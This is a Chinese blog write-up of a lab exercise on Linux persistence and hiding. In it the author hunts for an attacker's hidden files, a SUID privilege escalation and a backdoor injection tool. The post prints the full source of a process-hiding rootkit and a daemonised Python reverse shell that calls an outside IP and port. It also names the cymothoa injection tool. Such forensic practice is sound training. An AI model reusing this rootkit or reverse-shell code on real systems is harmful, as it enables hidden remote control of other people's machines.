第三章 权限维持-linux权限维持-隐藏-玄机靶场

字数统计: 1.6k字   |   阅读时长: 8分
玄机靶场

linux权限维持玄机靶场自用笔记。

题目简介

1
2
3
4
5
1.黑客隐藏的隐藏的文件 完整路径md5
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
3.黑客提权所用的命令 完整路径的md5 flag{md5} 
4.黑客尝试注入恶意代码的工具完整路径md5
5.使用命令运行 ./x.xx 执行该文件  将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

1.黑客隐藏的隐藏的文件 完整路径md5

进入查询,发现vim的记录文件 .viminfo 读取它发现几个有意识到路径

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Command Line History (newest to oldest):
:q!
:q
:wq

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:

# File marks:
'0  1  0  /tmp/.temp/libprocesshider/1.py
'1  4  0  /tmp/.temp/libprocesshider/1.py
'2  12  40  /tmp/.temp/libprocesshider/processhider.c
'3  24  47  /tmp/.temp/libprocesshider/1.py
'4  2  1  /var/www/html/sh.php

发现libprocesshider 是一个Linux 持久性訪問到工具,1.py是这个工具所产生的执行文件。对这个目录文件 /tmp/.temp/libprocesshider/1.py 加密,提交 flag{109ccb5768c70638e24fb46ee7957e37}

2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}

进行分析/tmp/.temp/libprocesshider/下的文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
root@xuanji:~# cat /tmp/.temp/libprocesshider/processhider.c
#define _GNU_SOURCE

#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "1.py";

/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }

    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);
    if(ret == -1) {
        return 0;
    }

    buf[ret] = 0;
    return 1;
}

/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
 
    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }

    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }

    fclose(f);

    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);
    return 1;
}

#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
                                                                        \
struct dirent* readdir(DIR *dirp)                                       \
{                                                                       \
    if(original_##readdir == NULL) {                                    \
        original_##readdir = dlsym(RTLD_NEXT, #readdir);               \
        if(original_##readdir == NULL)                                  \
        {                                                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent* dir;                                                 \
                                                                        \
    while(1)                                                            \
    {                                                                   \
        dir = original_##readdir(dirp);                                 \
        if(dir) {                                                       \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strcmp(process_name, process_to_filter) == 0) {         \
                continue;                                               \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
root@xuanji:~# 
root@xuanji:~# cat  /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3

import socket,subprocess,os,sys, time

pidrg = os.fork()
if pidrg > 0:
        sys.exit(0)

os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
        sys.exit(0)

while 1:
        try:
                sys.stdout.flush()
                sys.stderr.flush()
                fdreg = open("/dev/null", "w")
                sys.stdout = fdreg
                sys.stderr = fdreg
                sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sdregs.connect(("114.114.114.121",9999))
                os.dup2(sdregs.fileno(),0)
                os.dup2(sdregs.fileno(),1)
                os.dup2(sdregs.fileno(),2)
                p=subprocess.call(["/bin/bash","-i"])
                sdregs.close()
        except Exception:
                pass
        time.sleep(2)
root@xuanji:~#

发现在1.py 提到一个sdregs.connect(("114.114.114.121",9999)) ,flag{114.114.114.121:9999}

3.黑客提权所用的命令

用命令查询find / -perm -u=s -type f 2>/dev/null ,suid提权查询

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device

发现find 可以进行

image-20240708223713030

故flag为 /usr/bin/find md5加密,提交 flag{7fd5884f493f4aaf96abee286ee04120}

4.黑客尝试注入恶意代码的工具

执行find / -name '.*'查询隐藏文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile

/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/opt/.cymothoa-1-beta

发现一个奇怪的目录/opt/.cymothoa-1-beta,cd 进去发现是一个工具目录:

1
2
3
root@xuanji:/opt/.cymothoa-1-beta# ls
Makefile  bgrep.c  cymothoa    cymothoa.h             payloads    personalization.h  syscalls.txt  udp_server.c
bgrep     core     cymothoa.c  hexdump_to_cstring.pl  payloads.h  syscall_code.pl    udp_server

查询发现是一个后门隐藏工具。

![image-20240708230421498](/Users/lexs/Library/Application Support/typora-user-images/image-20240708230421498.png)

故, /opt/.cymothoa-1-beta/cymothoa 加密,提交 flag{087c267368ece4fcf422ff733b51aed9}

5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec** 值 作为flag提交

Cat 查看1.py:

1
2
3
4
root@xuanji:/opt/.cymothoa-1-beta# cat /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3

import socket,subprocess,os,sys, time

发现默认是“#!/usr/bin/python3” ,即pyton3运行1.py,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@xuanji:~# python3 /tmp/.temp/libprocesshider/1.py
root@xuanji:~# netstat -alntp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      11/apache2      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      10/sshd         
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      1 10.244.6.152:46896      114.114.114.121:9999    SYN_SENT    19439/python3   
tcp        0      1 10.244.6.152:48628      114.114.114.121:9999    SYN_SENT    -               
tcp        0      0 10.244.6.152:22         10.244.0.1:63226        ESTABLISHED 393/1           
tcp        0      1 10.244.6.152:48618      114.114.114.121:9999    SYN_SENT    -               
tcp        0      1 10.244.6.152:40544      114.114.114.121:9999    SYN_SENT    -               
tcp        0      0 10.244.6.152:22         10.244.0.1:4984         ESTABLISHED 9187/sshd: root@not
tcp6       0      0 :::22                   :::*                    LISTEN      10/sshd         
root@xuanji:~# whereis /python3 
python3: /usr/bin/python3 /usr/bin/python3.4 /usr/bin/python3.4m /etc/python3 /etc/python3.4 /usr/lib/python3 /usr/lib/python3.4 /usr/local/lib/python3.4 /usr/share/python3 /usr/share/man/man1/python3.1.gz
root@xuanji:~#ls -lab /usr/bin/python3
lrwxrwxrwx. 1 root root 9 Mar 23  2014 /usr/bin/python3 -> python3.4

where查询python3 位置,最后发现链接到 /usr/bin/python3.4

按题目要求提供完整的执行程序为flag :flag{/usr/bin/python3.4}

本文标题:第三章 权限维持-linux权限维持-隐藏-玄机靶场

文章作者:lexsd6

发布时间:2024-07-10, 21:59:19

最后更新:2024-07-10, 21:58:53

原始链接:lexsd6.github.io/2024/07/10/%E7%AC%AC%E4%B8%89%E7%AB%A0-%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81-linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81-%E9%9A%90%E8%97%8F/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 题目简介
  2. 1.黑客隐藏的隐藏的文件 完整路径md5
  3. 2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
  4. 3.黑客提权所用的命令
  5. 4.黑客尝试注入恶意代码的工具
  6. 5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec** 值 作为flag提交
|